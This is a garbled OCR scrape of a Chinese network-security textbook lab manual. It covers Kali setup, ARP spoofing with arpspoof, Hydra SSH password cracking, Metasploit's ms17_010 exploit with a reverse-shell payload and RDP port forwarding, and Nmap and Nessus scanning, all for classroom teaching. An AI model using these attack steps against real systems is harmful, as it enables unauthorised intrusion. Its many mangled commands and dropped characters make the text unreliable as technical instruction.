計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)(第7版)(微課版) 實(shí)驗(yàn)手冊匯 -ARP欺騙實(shí)例-Kali -口令破解_第1頁
計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)(第7版)(微課版) 實(shí)驗(yàn)手冊匯 -ARP欺騙實(shí)例-Kali -口令破解_第2頁
計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)(第7版)(微課版) 實(shí)驗(yàn)手冊匯 -ARP欺騙實(shí)例-Kali -口令破解_第3頁
計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)(第7版)(微課版) 實(shí)驗(yàn)手冊匯 -ARP欺騙實(shí)例-Kali -口令破解_第4頁
計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)(第7版)(微課版) 實(shí)驗(yàn)手冊匯 -ARP欺騙實(shí)例-Kali -口令破解_第5頁
已閱讀5頁,還剩177頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

ARP欺騙實(shí)例ai中利用Arspoof工具進(jìn)行ARP攻擊ARPARPARPWnscdIPWnsifigIP126888.15,12.8.82igigaliigig12.81882確認(rèn)網(wǎng)絡(luò)狀態(tài)后我們來構(gòu)造ARP攻擊命令,我們在終端內(nèi)輸入:arpspoof-ieth0-t1218.8.5iettaliWnsigig新浪至此我們通過arpspoof工具造成了目標(biāo)主機(jī)的網(wǎng)絡(luò)斷網(wǎng)的實(shí)驗(yàn)就完成了。arsofRPali/ocy/et/i4/i_oadi_rwdIPec1"/y/etiv4/i_”1IP開啟IPaliasf工具aliARPARPARPtl+CAPalirsof-iet0-t928.8818ali會向Wno(2.8.8835)發(fā)送P響應(yīng)包,告訴Wns目標(biāo)主機(jī)1218.8.8WnosalialiWnosigigww.sna..cWnosaliwesarkwesk令搜索框內(nèi)輸入:i.r1926818.1||i.192168.8.35。這樣可以獲取目標(biāo)Wnosalitl+CRPARsfARP欺騙的示例就講解完成了。alirsofARPai的基本配置kalikalikalirootip->安裝中文輸入法->編譯內(nèi)核->ssh一、設(shè)置root用戶第一次登錄用戶身份后,輸入命令:sudopasswdrootroot(root然后輸入命令:surootrootroot二、配置靜態(tài)ipip:servicenetworkingstop,將網(wǎng)絡(luò)vim/etc/network/interfaces iautoeth0ifaceeth0inetstaticaddress39netmaskgateway在修改完成后按“esc”鍵退出編輯模式,再輸入“:wq!”,回車后強(qiáng)制保存文件,并退出vim然后輸入命令:servicenetworkingstart重新開啟網(wǎng)絡(luò)服務(wù)最后輸入命令:ifconfig 查看網(wǎng)絡(luò)情況,發(fā)現(xiàn)靜態(tài)IP已配置完成三、更新軟件kali是一個(gè)滾動式更新的系統(tǒng),各種軟件都一直在更新,所以時(shí)常會用到更新安裝軟件的命令。輸入命令:sudoaptupdate 系統(tǒng)將從源中下載最新的軟件安裝包,然后輸入命令:sudoaptupgrade系統(tǒng)會打開這些最新的軟件安裝包,并將軟件安裝在系統(tǒng)中。最后輸入命令:sudoaptclean將舊的安裝包刪除,清理內(nèi)存空間。ps:四、配置更新源kali的源配置文件在/etc/apt/sources.list文件中,輸入命令:suvim/etc/apt/sources.listvimikali"Additional"這一行vim以下為國內(nèi)常用的幾個(gè)源:#中科大deb /kali kali-rolling main non-freecontribdeb-src/kalikali-rollingmainnon-freecontrib#阿里云deb /kali kali-rolling main non-freecontribdeb-src/kalikali-rollingmainnon-freecontrib#清華大學(xué)deb /kali kali-rolling maincontribnon-freedeb-src/kalikali-rollingmaincontribnon-free#浙大deb/kalikali-rollingmaincontribnon-freedeb-src/kalikali-rollingmaincontribnon-free五、設(shè)定屏幕鎖定時(shí)間kalikaliupgrade六、ssh設(shè)置sshunix符界面的遠(yuǎn)程登錄管理,他默認(rèn)的使用的端口是22號,采用密文的形eneshkalilinuxsshroot我們在本實(shí)驗(yàn)中通過設(shè)置ssh實(shí)現(xiàn)遠(yuǎn)程登錄kalilinuxrootrootsurootrootrootdetcsshs-ddsudogedit/etc/ssh/sshd_configconfigPriRooLoginye將PasworAuhncaonyes(3)隨后點(diǎn)擊右上角“保存”shecnt.d/sshretar(5)接著輸入lsof-i:22以查看是否監(jiān)聽查看SHecin.d/sshstau7將sshudaerc.dshenble七、拍攝快照:aliae-八、其他命令及系統(tǒng)優(yōu)化1Kai在終端中執(zhí)行uname-r命令,查看當(dāng)前系統(tǒng)的內(nèi)核版本2、查看內(nèi)核文件apt-cachesearchlinux-headersp-gelynx-hedes-$(nae)3sudoapt-getautoclean2、sudoapt-getclean3uoap-geuoeove4、sudonautilus/boot以上就是本次kali基本配置的全部內(nèi)容。ai的基本應(yīng)用KaliKali別:通用命令、操作命令、讀取編輯命令和權(quán)限命令。一、通用命令獲取詳細(xì)信息Uname,通過這個(gè)命令獲取系統(tǒng)規(guī)格的詳細(xì)信息顯示工作目錄的名稱pwdKaliLinux查看文件內(nèi)容及存儲目錄ls(文件)的簡便方法。ls-l查看歷史記錄命令history打印文本echo命令是將任何文本打印到您將其定向到的位置。我們在終端中輸入echo命令,然后輸入shenzhen,這就完成了在新文件中打印復(fù)制的文本。echo[guangdong]將復(fù)制的文本打印到現(xiàn)有文件。如果使用’‘echo查看文件信息我們創(chuàng)建文件后,可以在終端中輸入catshenzhen命令來查看文件信息,cat命令主要是查看文件內(nèi)容。清除終端內(nèi)信息clearKaliKali二、操作命令在系統(tǒng)中創(chuàng)建目錄我們在終端中輸入mkdirtest名稱,我們就可以在系統(tǒng)中創(chuàng)建一個(gè)目錄。mkdir更改當(dāng)前目錄cdKalichangedirectorycdcdtest,回車后我們就進(jìn)入了test目錄。接著輸入cd..命令,回車后我們就返回了上級目錄如果輸入cd/命令,回車后就返回了根目錄。復(fù)制文件或目錄Kalicpcpcp-u-vtest1test2test1test2cp-itest1test2itest1test2,test2cp-rbeijingguangzhoubeijingguangzhou,這條命令主要是用于復(fù)制目錄(包含目錄中的文件)。在目錄之間移動文件cpmv,mvWindowslsapplebeijingmvapple/beijing回車后,繼續(xù)輸入cdbeijing命令,進(jìn)入到beijing這個(gè)目錄,我們輸入ls命令,可以看到在beijing目錄下我們剛才移動的apple文件。mv命令也可以對文件進(jìn)行更改文件名稱的操作,我們在終端中輸入,mvapplelsapplecatrmrmcat回車后我們lscat三、讀取編輯命令more,moreapple.txt,我們可以使用Bviviapple.txtcatviESCwq,回車后就把我們編輯的文件進(jìn)行了保存。四、權(quán)限命令Kalichmod命令(changemode的縮寫)用于管理文件和目錄權(quán)限,并確定誰可以訪問它們。為了更好地理解chmodLinuxLinux3(r),寫(w)和執(zhí)行(x)權(quán)限。這些權(quán)限ls看到當(dāng)前目錄下的文件,這些文件分別被賦予了不同權(quán)限。如果我們想要修改apple.txt這個(gè)文件的訪問或修改權(quán)限可以使用chmod命令,我們在終端輸入sudochmodxapple.txtlsapple.txt這個(gè)文件的加入的執(zhí)行權(quán)限是否修改成功。chmodrootsoduKali五、常用測試工具下面我們介紹一些Kali下一些常用的測試工具。我們主要介紹的工具包括:NETCAT、HYDRA和Crunch工具。NETCATNC,在網(wǎng)絡(luò)安全界被稱為“瑞士軍刀”,用來在兩臺機(jī)器TCP/UDPKalincNetcatHTTPTCPTCP/GETGET/HTTP/1.0HTTPNetcat還可以用來做端口掃描,用來發(fā)現(xiàn)一些機(jī)器上開放的端口。我們在終端中輸入:nc-zvlocalhost-l22命令,其中-z參數(shù)表示使用Zero-I/O參數(shù)用來顯示網(wǎng)絡(luò)連接中的詳細(xì)輸出信息。根據(jù)輸出信息可以看出,2222NC:nc-l22nc.txtnetcat成功連接到該端口,netcat會發(fā)送文件內(nèi)容。我們接著在終端中輸入:nc2822>nc.txt當(dāng)連接成功后,本地主機(jī)會發(fā)送文件內(nèi)容到28NCHydra下面我們來繼續(xù)介紹Kali系統(tǒng)的另外一個(gè)工具Hydra,它是著名黑客組織thcssh-Luser.txt-Ppass.txt-t2-vV-ens30ssh大寫user.txt.-Ppass.txt,-ensssh可以看到破解成功,30的ssh密碼為root。hydrasshftp、pop3Kali:cd/use/share/wordlists,我們進(jìn)lsCrunch字典生成工具crunch。打開終端輸入:suroot,輸入密碼后輸入crunch346789>>pass1.txt,這個(gè)命令的含義是生成由三位數(shù)和四位數(shù)生成的字典,且都有6789數(shù)字組成,最后生成到到桌面pass1.txt文件。Kali虛擬機(jī)的安裝kali鏡像的下載Kali Linux 的下載地址 installer-images,下載界面如示。3264ISO64ISOKaliLinux安裝至MwaeorksttinVMware Workstation16.0,官方下載地址/cn/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/16_0。本小節(jié)將介紹在VMwareWorkstation上安裝KaliLinux操作系統(tǒng)。啟動VMwareWorkstation,將顯示如圖1所示的界面。1.4安Kali 11.VMwreWorkstation16在該界面單擊“創(chuàng)建新的虛擬機(jī)”圖標(biāo),將顯示如圖2所示的界面。圖2新建虛擬機(jī)向?qū)?1.4安Kali 2界面。

圖3安裝客戶機(jī)操作系統(tǒng)3 1.4安Kali 3圖4選擇客戶機(jī)操作系統(tǒng)LinuxLinux5.X4圖5命名虛擬機(jī)51.4安Kali 4圖6指定磁盤容量6 1.4安Kali 5圖7已準(zhǔn)備好創(chuàng)建虛擬機(jī)該界面顯示了所創(chuàng)建虛擬機(jī)的詳細(xì)信息,此時(shí)就可以創(chuàng)建操作系統(tǒng)了。然后單擊“完成”按鈕,將顯示如圖7所示的界面。圖8創(chuàng)建虛擬機(jī)KaliLinux。KaliLinuxVMwareWorkstation81.4安Kali 6圖9虛擬機(jī)設(shè)置KaliLinux安裝的磁盤空間的最小值是8GB。為了便于使用,這里推薦至少25GB去保存附加程序和文件。內(nèi)存最好為512MB以上。1.4安Kali 7圖10虛擬機(jī)設(shè)置在該界面選擇“CD/DVD(IDE)”ISOKaliLinux8在圖8界面,選擇“開啟此虛擬機(jī)”命令。圖11啟動界面該界面是Kali的引導(dǎo)界面,在該界面選擇安裝方式。這里選擇GraphicalInstall(圖形界面安裝)1.4安Kali 8圖12選擇語言1.4安Kali 9在該界面選擇安裝系統(tǒng)的默認(rèn)語言為Chinese(Simplified)圖13選擇您的區(qū)域在該界面選擇區(qū)域?yàn)椤爸袊?,然后單擊“繼續(xù)”按鈕1.4安Kali 101.4安Kali 11圖14配置鍵盤在該界面選擇鍵盤模式為“漢語”,然后單擊“繼續(xù)”按鈕圖15配置網(wǎng)絡(luò)該界面用來設(shè)置系統(tǒng)的主機(jī)名,這里使用默認(rèn)的主機(jī)名Kali(用戶也可以輸入自己系統(tǒng)的名字。然后單擊“繼續(xù)”按鈕12圖16設(shè)置普通用戶用戶名在該界面設(shè)置普通用戶用戶名,然后單擊“繼續(xù)”按鈕13圖17設(shè)置普通用戶用戶名在該界面設(shè)置普通用戶用戶名,然后單擊“繼續(xù)”按鈕14圖18設(shè)置普通用戶密碼在該界面設(shè)置普通用戶密碼,然后單擊“繼續(xù)”按鈕,15圖19磁盤分區(qū)16圖20磁盤分區(qū)17圖21已選擇要分區(qū)該界面要求選擇分區(qū)方案,默認(rèn)提供了三種方案。這里選擇(推薦新手使用18圖22磁盤分區(qū)19圖23磁盤分區(qū)在該界面選擇“是”復(fù)選框,然后單擊“繼續(xù)”按鈕。20圖24安裝系統(tǒng)現(xiàn)在就開始安裝系統(tǒng)了。在安裝過程中需要設(shè)置一些信息。21圖25軟件選擇在該界面將GNOME復(fù)選框選中,然后單擊“繼續(xù)”按鈕。22圖26圖形界面選擇在該界面將選擇圖形化界面,Lightdm為默認(rèn)選項(xiàng),我們選擇在上一步軟件選擇的GNOME也就是gdm3,然后單擊“繼續(xù)”按鈕。23圖27安裝GRUB啟動引導(dǎo)器GRUB24圖28安裝GRUB啟動引導(dǎo)器GRUB25圖28安裝完成安裝完成,點(diǎn)擊繼續(xù)重新啟動即可進(jìn)入系統(tǒng)。26圖29登錄系統(tǒng)在該界面選擇登錄用戶,此時(shí)無法登錄root用戶,選擇在安裝過程中設(shè)置的普通用戶user。圖30登錄系統(tǒng)在該界面輸入密碼登錄系統(tǒng)。27圖31系統(tǒng)桌面該界面為kali的系統(tǒng)桌面。圖31更改root密碼由于此時(shí)登錄賬號為普通用戶,需要通過命令對root賬號28進(jìn)行密碼更改。點(diǎn)擊“終端”圖標(biāo),在終端中輸入命令:sudopasswdroot。在回顯中依次輸入普通賬號的密碼、設(shè)置的root用戶的密碼、確認(rèn)root用的密碼。當(dāng)回顯已成功更新密碼時(shí),證明root用戶密碼修改成功圖32更改用戶在終端中輸入命令:sudoroot輸入密碼后發(fā)現(xiàn)終端用戶名變更為root,證明root用戶密碼修改成功。29Matesploit的基本使用(1)Metaplit一、Metasploit的啟動Metasplit圖.etaslit1然后在下拉菜單中點(diǎn)擊漏洞利用工具集,然后在彈出的右側(cè)菜單中點(diǎn)擊MetasplitFramewok輸入當(dāng)前用戶名口令。

圖.etaslit2圖.etaslit3Metasplit。圖.etaslit4msfcosole圖.etasploit的啟動-1回車后,程序就開始啟動了。圖.etaslit2expoits,多少個(gè)paylads圖.etaslit二、Metasploit的幫助我們在終端中輸入:helphelpmsfmsfCoreComands核心命令;ModuleCommands模塊命令;JobComands后臺任務(wù)命令;ReourceSriptCommnds資源腳本命令;DatabseBacendComands數(shù)據(jù)庫后端命令;CredntialsBackendComands證書/DevelperCommandshelp圖.etsplot核心命令CoreCommands:圖.模塊命令ModuleCommand:圖.后臺任務(wù)命令JobCommand:圖.資源腳本命令ResourceScritComands:圖0.數(shù)據(jù)庫后端命令DatabaseackendCommands:圖1.證書/憑證后端命令CredetialsBacendCommand:圖2.證書開發(fā)人員命令Developerommand:圖3.三、Metasploit的常用命令connect命令核心命令中的connect命令,connect命令主要用于遠(yuǎn)程連接主機(jī)。一般用于內(nèi)網(wǎng)滲透。IP輸入比較常用的命令:conect580圖4ip5IP80conect80命令后直接回車。圖5.getgetshow

圖6showall,encodrs,nop,explits,pyload,auxiiary,post,plugins,inf,optionsmeasplitexpoits。showexplots圖7.shwxploismeasplit圖8.shwxploisjiego結(jié)果showpayloads圖9.shwaladsmeasplit圖0.shwaladsshowauxiiary圖1.shwaxiliarymeasplit圖2.shwaxiliaysearch命令當(dāng)我們使用msfconsole的時(shí)候,會用到各種漏洞模塊、各種插件,我們可以使用search命令來搜索一些關(guān)鍵字信息。searchayloadwindws圖3.seachaylodidows結(jié)果Widowspaylod圖4.seachaylodidows結(jié)果s08_07圖5.seachm0_067回車后,可以看到直接顯示了漏洞相關(guān)可利用的模塊。圖6.seachm0_067searchms08_067rank命令。排名RankRank對漏洞利用模塊進(jìn)行搜索,分類以及排序。Rankexcllent漏洞利用程序絕對不會使目標(biāo)服務(wù)崩潰,就像SQLgreatgood該漏洞利用程序有一個(gè)默認(rèn)目標(biāo)系統(tǒng),并且是這種類型軟件的“常見情況”(Windos7,服務(wù)器等)normal該漏洞利用程序是可靠的,但是依賴于特定的版本,并且不能或者不能可靠地自動檢測。average該漏洞利用程序不可靠或者難以利用。lowmanual按路徑path搜索pathmysqlath:mysql圖7.seachathmql命令mysqlpltform

圖8.seachathmqlpltformpatformrank在終端中輸入:searchpatform:mysql圖9.seachlatfrmmqlranknormaltype

圖0.seachlatfrmmql結(jié)果type根據(jù)特定類型的模塊進(jìn)行相應(yīng)的搜索,特定類型的模塊包括:expoit,paylad,auxiliary,encoer,evasion,pst,ornop。在終端中輸入 seachtype:eploit圖1.seachypeexplot命令exploitCVE

圖2.seachypeexplot結(jié)果CVECVEve:CVE2017-864圖3.seachceCVE-7-64回車后就會顯示相應(yīng)CVE漏洞可利用的模塊。圖2.seachceCVE-7-64結(jié)果Metasplituse命令當(dāng)使用到某個(gè)模塊,就要使用到use命令,我們先查找出自己想要的ms17010seachms17010圖2.ms1_010回車后找到可以用的滲透測試攻擊模塊。圖2.ms_010結(jié)果在終端中輸入:useauxiliry/scaner/smbsmbms17010命令圖3.usebash圖4info在終端中輸入:info圖51回車后就顯示出這個(gè)模塊的相關(guān)信息。圖62信息中需要我們重點(diǎn)關(guān)注的內(nèi)容是:1、可用目標(biāo),就是查看可以攻擊哪些操作系統(tǒng)。2、Basicoptions:調(diào)用漏洞需要的相關(guān)參數(shù)。3、漏洞描述和執(zhí)行過show終端中輸入:showotios圖61圖62在終端中輸入:showtargets圖71圖82showopionsRHOSS192.168.88135back

圖9圖0圖1MetasplitMesloit的基本使用(2)easoitMatesploit的設(shè)置打開alimosleeasoitseaxilaysnerprta/cpswotos依次輸入命令以設(shè)置相關(guān)策略setrhts92681815setports1-65535setthreads100settmeut0swtnsIPxlit445Metasploitseaxliaryaersbsm_m700sm1_0IPsetrhts92681815setthreads10輸入swotosxlit1218.8135Wno74mfsexlitwnoss/m1_10eernalle,依次輸入命令以進(jìn)行相關(guān)參數(shù)的設(shè)置setrhts9268181(IP)setyladwnsx4/eretres_c)setlt1218.8.8IP)xlterer。在終端中輸入background命令后,先退出當(dāng)前會話。sesin1sesin的IDessis-swnenm1218.8135t.6/lsscritwnenmls命tet_saettsesis-i1meereesesis1Dortwdadd-l22r5-p338933892222命令執(zhí)行完畢后我們輸入netstat-anpt命令查看自身監(jiān)聽端口,我們發(fā)現(xiàn)已經(jīng)監(jiān)聽了2222端口,這時(shí)可以通過連接2222端口,來連接目標(biāo)系統(tǒng)的3389端口。eskp1270.1:222rootWnosalisomslemmf>mosleWnsm101(xlr6和7版本sechm1_810_8easoit4列,分別表示模塊名稱、公開時(shí)間、等級及描述。sem108swptnsptns這時(shí)就需要用到set命,將監(jiān)聽IPSVHT設(shè)置成攻擊機(jī)本機(jī)IP地址。我們在終端中etrvt2.688828rnmfURLt:/:080Xi1,Exlermfessis1。easoit的MyQLMyQLMyLyQLMyQLSQLeasoitMyLalimosleeasploit的控制終端。echsl7auxilaysaners/sl_lgnuse17swtosequed為esalisraetxt和aswrtsetIP地址1218.8.8t設(shè)置完成后我們輸入runyQLMyQLeasoitSQ現(xiàn)了相關(guān)版本信息。接著我們可以看到有一條破解成功的信息,信息中可以看到已測試出MyQLrootMyQLeasoit掃描器的使用(2)使用Nessus進(jìn)行漏洞掃描Nessus安裝環(huán)境:宿主主機(jī)windows7x64虛擬主機(jī)kali202264VMware:VMwareWorkstationPro16安裝過程1NessusNesssNesss-104.1所示圖12KaliLinuxLinux-Debianamd-64,23圖2圖33)下載完畢后找到在本機(jī)種的安裝包,如圖4所示圖44)將下載的安裝包直接拉進(jìn)VM的kali中,如圖5所示圖55)右鍵選擇Nessus的安裝包,選擇‘在這里打開終端,如圖6所示圖66)‘ls圖77)suroot8圖88)dpki//bin/sstemctltartnessusd.serie9圖99)右鍵點(diǎn)擊紅框中的連接,并選擇‘打開鏈接’,如圖10所示圖1010)AdvancdAccepttheRiskandCntine圖1111)NessusEssntias,12Conti圖1212Emai13圖1313)輸入驗(yàn)證碼,并點(diǎn)擊進(jìn)入下一步,如圖14所示圖1414)Nessus:admin:roo5圖1515)等待插件安裝完成,由于網(wǎng)絡(luò)問題可能會失敗,多嘗試幾次,如圖16所示1617

圖16圖1717)安裝完成后,設(shè)置服務(wù)開機(jī)自啟動。sstemctltartnessud.sricesstemctleablnessud.serie18圖18Nessus掃描Windos主機(jī)1)indos7ip19218.88132)登錄https//270.0.1884 用戶:admin密碼root,如圖19所圖193)NewScan20圖204)選擇AdvancedScan21圖215)在name中輸入掃描名稱,此處設(shè)置掃描名稱為adv-scan2dedescrptiontaretsipindos7ip192168.188.15 plugins6)填寫完畢后點(diǎn)擊保存,如圖22所示7)點(diǎn)擊Lunch進(jìn)行本地掃描

圖22圖238)掃描任務(wù)執(zhí)行完成后,顯示如圖24所示的界面圖249)在該界面雙擊掃描任務(wù)名稱adv-scan1,將顯示掃描的詳細(xì)信息,如圖25所示圖2510)從該界面可以看到總共掃描了一臺主機(jī)。11)ulnerbilty26圖2612)HostIP13)192168.88.357圖2714)INFO28圖2815NessusNessus、PDF、HTML、CSVNessusDB。16)單擊Eport按鈕,選擇導(dǎo)出文件的格式,可選擇的格式包含Nssus和NessusDB,如圖29所示圖2917)ReportPDFHTM、30圖3018PDF31圖31掃描網(wǎng)絡(luò)漏洞1)BasiNetorkScan32圖322)nameNetorkScanttaretsipindos7ip192168.188.1533圖333)Pluins34CICO 掃描CICO系統(tǒng)DNS DNSultUixActs FTP FTPiwls 掃描理火墻Ginasellemely 掃描程的hellGel 掃描用服務(wù)Newe eer--erFleSaring licyCmlance 掃描CIS和CAP信息SCADA MTPolems 掃描MTP問題SNMP SNMPerveeectnetigs 圖344)點(diǎn)擊Lunch進(jìn)行網(wǎng)絡(luò)漏洞掃描,如圖35所示5)查看掃描結(jié)果,如圖36所示

圖35圖366)從改界面可以看出漏洞信息,如圖37、圖38所示圖37圖38掃描器的使用(1)-Nmap掃描器的使用Nmap是一個(gè)網(wǎng)絡(luò)連接端掃描軟件,用來掃描網(wǎng)上電腦開放的網(wǎng)(這是亦稱fingerprinting)。它是網(wǎng)絡(luò)管理員必用的軟件之一,以及用以評估網(wǎng)絡(luò)系統(tǒng)安全。其基本功能有四個(gè):主機(jī)發(fā)現(xiàn)(HostDiscovery)TCP/ICMP端口掃描(PortScanning)枚舉目標(biāo)主機(jī)上的開放端口。版本偵測(VersionDetection)詢問遠(yuǎn)程設(shè)備上的網(wǎng)絡(luò)服務(wù)以確定應(yīng)用程序名稱和版本號。操作系統(tǒng)偵測(OperatingSystemDetection)確定網(wǎng)絡(luò)設(shè)備的操作系統(tǒng)和硬件特性。主機(jī)發(fā)現(xiàn)在終端模擬器輸入surootrootroot,root-sPping-sP參數(shù)主要是用于使用ping的方法進(jìn)行主機(jī)探測,掃描/24網(wǎng)段,得出可響應(yīng)的主機(jī)列表,在列表中可以看到網(wǎng)段內(nèi)開放的主機(jī)有256臺。如圖1所示nmap-sP/24網(wǎng)段圖1-P0ping)PingNmapP0NmpIP1225、1102nmap-PO12圖2-PS[portlist](TCPSYNPing)NmapIP-PS這個(gè)參數(shù)來進(jìn)行域名探測。通過-PSSYNTCPup25801104433nmap-PS圖3-PU[portlist](UDPPing)-PUUDPupdown。-Ps4Nmap-Pn-PU圖4端口掃描nmapIPopen(開放的),filtered(被過濾的),closedOpenTCP連接或者UDP報(bào)文。Closed(關(guān)閉的):由于包過濾阻止探測報(bào)文到達(dá)端口,nmapFilteredUnfiltered(Nmap無法確定它們是關(guān)閉還是開放。Open/Filtered:端口被過濾或者是開放的,NmapClosed/Filtered:端口被過濾或者是關(guān)閉的,Nmap常見服務(wù)對應(yīng)端口號如下:服務(wù)端口號HTTP80HTTPS443Telnet23FTP21SSH(安全登錄)、SCP(文件傳輸)、端口重定向22SMTP25POP3110WebLogic7001TOMCAT8080WIN2003遠(yuǎn)程登錄3389Oracle數(shù)據(jù)庫1521MSSQL*SEVER數(shù)據(jù)庫sever1433MySQL數(shù)據(jù)庫sever3306-sS(TCPSYN在本實(shí)驗(yàn)中,使用-sS進(jìn)行全端口掃描,可以看到IP地址為12TCP251105Nmap-sS12圖5使用的參數(shù)SSTCPSYN掃描,被稱為半開放掃描。因?yàn)樗淮蜷_一個(gè)完全的TCP連接,通常我們會完成針對特定端口或某個(gè)區(qū)間范圍的端口掃描任務(wù)。-P使用-P-vNmap本實(shí)驗(yàn)中對目標(biāo)主機(jī)的1-30端口進(jìn)行掃描,可以看到IP地址為121302225Nmap6nmap-sS-p1-30-v12圖6版本偵測在一些漏洞公告或新聞中會明確一個(gè)漏洞所影響的應(yīng)用程序在n-map中通過使用相應(yīng)參數(shù)來進(jìn)行目標(biāo)主機(jī)版本探測,可以獲得相應(yīng)信息,可以知道正在運(yùn)行的服務(wù)類型以及他們的版本。-sV (版本探測) 該控制選項(xiàng)打開nmap的版本探測功能??梢钥闯?2開放的端口有22、25等端口,提供了相關(guān)服務(wù)以及服務(wù)的版本號,如圖7所示nmap-sV12圖7也可以用 -A 選項(xiàng)同時(shí)打開操作系統(tǒng)探測和版本探測,來查看目標(biāo)主機(jī)的操作系統(tǒng)版本??梢钥吹奖緦?shí)驗(yàn)中,目標(biāo)主機(jī)的操作系統(tǒng)為Linux2.4.20 ,如圖8所示。nmap-sV12-A圖81)設(shè)置版本掃描的強(qiáng)度--version-intensity<強(qiáng)度值>(設(shè)置版本掃描強(qiáng)度)nmap進(jìn)行版本掃描(即使用-sV選項(xiàng))時(shí),nmap發(fā)送一系列探測報(bào)文,每個(gè)報(bào)文都被賦予一個(gè)1到9之間的值。被賦予較低值強(qiáng)度值參數(shù)說明了應(yīng)該使用哪些探測報(bào)文。數(shù)值越高,掃描強(qiáng)度值必須在0和9。9圖9操作系統(tǒng)偵測最后我們來介紹一下利用N-map對目標(biāo)主機(jī)的操作系統(tǒng)偵測。網(wǎng)絡(luò)安全掃描的過程,識別操作系統(tǒng)也是獲取漏洞存在TCP/IPfingerprinting指紋掃描,這種技術(shù)對操作系統(tǒng)的探測非常有效。Nmap發(fā)送一系列TCP和UDP報(bào)文到遠(yuǎn)程主機(jī),檢查響應(yīng)中的每一個(gè)比特。在進(jìn)行一打測試如TCPISN,TCP采樣,和初始窗口大小檢查之后,Nmap把結(jié)果和數(shù)據(jù)庫nmap-os-fingerprints中超過1500個(gè)已知的操作系統(tǒng)的fingerprints啟用操作系統(tǒng)檢測rootsu-OIP07linux10圖10-O-AIP07Linux11nmap-O-A07圖11--osscan-guessNmapNmapNmap默認(rèn)會進(jìn)行這種匹配,得出結(jié)果后可通過其他方式進(jìn)行驗(yàn)證,可以提高對不確定目標(biāo)的探測并使得Nmap的推測更加有效。本實(shí)驗(yàn)中可以看到目標(biāo)主機(jī)的操作系統(tǒng)版本為2.4.20。如圖12所示。nmap-O--osscan-guess07圖12Windows防火墻IPsec配置IPSec(Internet協(xié)議安全)是一個(gè)工業(yè)標(biāo)準(zhǔn)網(wǎng)絡(luò)安全協(xié)議,為IP網(wǎng)絡(luò)通TCP/IPSecIPIPSec結(jié)合密碼保護(hù)服務(wù)、安全協(xié)議組和動態(tài)密鑰管理三者來實(shí)現(xiàn)上述兩個(gè)目標(biāo),不僅能為企業(yè)局域網(wǎng)與撥號用戶、域、網(wǎng)站、遠(yuǎn)程站點(diǎn)以及Extranet之間的通信提供強(qiáng)有力且靈活的保護(hù),而且還能用來篩選特定數(shù)據(jù)流。IPSecIPSec。下面我們來創(chuàng)建一個(gè)基于Windows防火墻的IPSec隧道的安全連接規(guī)則。WindowsIPSecITWindowsIPIPIP我們進(jìn)行下一步,我們可以選擇或者自定義相應(yīng)的協(xié)議及端口,我們選擇TCP1445,IPSec隧道規(guī)則應(yīng)用到哪個(gè)網(wǎng)絡(luò),然后點(diǎn)擊下一步。最后我們給這個(gè)隧道起個(gè)名字叫IPSec合規(guī)則類型的類型o

新建連接安全規(guī)則向?qū)?匱暹步票:規(guī)則類型佬追類型要求佬邁終結(jié)點(diǎn)身份驗(yàn)汪方法文件名稱

你要創(chuàng)建的連接安全規(guī)則的類型O偏離O限制基千身份驗(yàn)證條件的連,接如1或成員身份或健座狀態(tài)o0免踩身份驗(yàn)證兇來自特定計(jì)算機(jī)的連接不進(jìn)行身份驗(yàn)證oO賑務(wù)妥到脤務(wù)妥(fil對指定計(jì)算機(jī)之間的連接進(jìn)行身份驗(yàn)證o@痙逕CD對兩臺計(jì)算機(jī)之間的連接進(jìn)行身份驗(yàn)證oO自定義C自定義規(guī)則oo若要隧道類型指定要創(chuàng)建的難通類o步黎規(guī)則類型

新建連接安全規(guī)則向?qū)阆M麆?chuàng)建什么類型的阻遍?@自定義程翌(吩

<上一ciI(!!))I 取J步自匡'步自隱逜類型要求憤姐終結(jié)點(diǎn)驗(yàn)證方法喊配贊文件名稱

指定燧追終結(jié)點(diǎn)以及可以在燧道的任意湍連接的計(jì)算機(jī)oO_)格本地計(jì)算機(jī)用作一個(gè)終結(jié)點(diǎn)o指定遠(yuǎn)程燧通終結(jié)點(diǎn)以及司以通過燧通連接的計(jì)算機(jī)侖O網(wǎng)關(guān)到客戶湍(z)-io指定遠(yuǎn)程客戶湍算是盓要免棕此燧道的受IPsec護(hù)的連?曰Y)。啤IPSeo保連接醞喊括包o否(Q.。通過饒道發(fā)送與該連接安全規(guī)則匹酘的所里o<LI步<n>>I—取消詹要求·

新建連接安全規(guī)則向?qū)?匡置步黎:規(guī)則類型燧通類型要求點(diǎn)口件名稱

進(jìn)行身份驗(yàn)證的時(shí)間O入站和出站連接要求身份驗(yàn)證但)入站和出站連接都必須通過身份驗(yàn)證才允許o要求對入站連接進(jìn)行身份驗(yàn)不要為出站連接建立痙遍@o@不進(jìn)行身份驗(yàn)證@所有連接不進(jìn)行身份驗(yàn)證o<上一步石門1下一步<!!>>I取消勹命隧道終結(jié)點(diǎn)rrs..go

新建連接安全規(guī)則向?qū)Х椒ńK結(jié)點(diǎn)方法終結(jié)點(diǎn)1諞口終結(jié)點(diǎn)2諞口正 445 任何型巴

斜昴橇月討猖結(jié)點(diǎn)2之間的連技格通過指定的隱遍終結(jié)·佬結(jié)點(diǎn)- IP地址 1:1指定秀匹配的IP地址終結(jié)豆1中的計(jì)算機(jī)(1)求隧道終結(jié)點(diǎn)口文件名稱

終結(jié)點(diǎn)溫近終結(jié)點(diǎn)1)IP.4地址(P)

心I!目揖(E腫JJ,ic(Rl滇fjj(I,

釭IP地址或子網(wǎng)心l例128.2192.16810/2420029心b1心1420074fff,6,4J20029d3b1心14274££f.390/112O此IP地址范圍(BJ從?·盧箭幫t,tlifi!£IPv6地址盧箭幫t,tlifi!£j設(shè)贊”達(dá)憔愿ij設(shè)贊”達(dá)點(diǎn)謁撞近終結(jié)點(diǎn)2)IP.4地址(4)IP心地址(6)

到(!):O心默認(rèn)網(wǎng)關(guān)ii(T'

